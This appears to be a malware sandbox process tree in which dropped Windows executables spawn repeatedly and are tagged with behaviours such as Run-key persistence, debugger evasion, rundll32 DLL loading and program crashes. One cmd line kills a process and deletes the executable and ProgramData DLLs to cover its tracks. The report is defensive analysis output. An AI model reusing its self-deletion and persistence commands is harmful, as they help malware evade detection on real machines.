C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8548 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11424 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Checks processor information in registry
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15072 -s 284⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12056 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
-
C:\Users\Admin\Documents\FIs4n_aUrxrpNs3zuKkcgZaF.exe"C:\Users\Admin\Documents\FIs4n_aUrxrpNs3zuKkcgZaF.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\FIs4n_aUrxrpNs3zuKkcgZaF.exe"C:\Users\Admin\Documents\FIs4n_aUrxrpNs3zuKkcgZaF.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FIs4n_aUrxrpNs3zuKkcgZaF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\FIs4n_aUrxrpNs3zuKkcgZaF.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FIs4n_aUrxrpNs3zuKkcgZaF.exe /f5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\Documents\7BOu9TIJMQySbeGQcDPiRFXQ.exe"C:\Users\Admin\Documents\7BOu9TIJMQySbeGQcDPiRFXQ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\mmhu7lViAMJDGo1Q3snJhdBM.exe"C:\Users\Admin\Documents\mmhu7lViAMJDGo1Q3snJhdBM.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6224862.exe"C:\Users\Admin\AppData\Roaming\6224862.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1364 -s 20844⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Roaming\4890110.exe"C:\Users\Admin\AppData\Roaming\4890110.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Roaming\1016681.exe"C:\Users\Admin\AppData\Roaming\1016681.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\1714949.exe"C:\Users\Admin\AppData\Roaming\1714949.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\5536172.exe"C:\Users\Admin\AppData\Roaming\5536172.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 24564⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Documents\vZuGD8zXLLqteNZ3ygWWvyHy.exe"C:\Users\Admin\Documents\vZuGD8zXLLqteNZ3ygWWvyHy.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1080 -ip 10801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4848 -ip 48481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4164 -ip 41641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4692 -ip 46921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 656 -ip 6561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 4522⤵
- Program crash
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5640 -ip 56401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5680 -ip 56801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6016 -ip 60161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 1364 -ip 13641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1048 -ip 10481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\5CD6.exeC:\Users\Admin\AppData\Local\Temp\5CD6.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
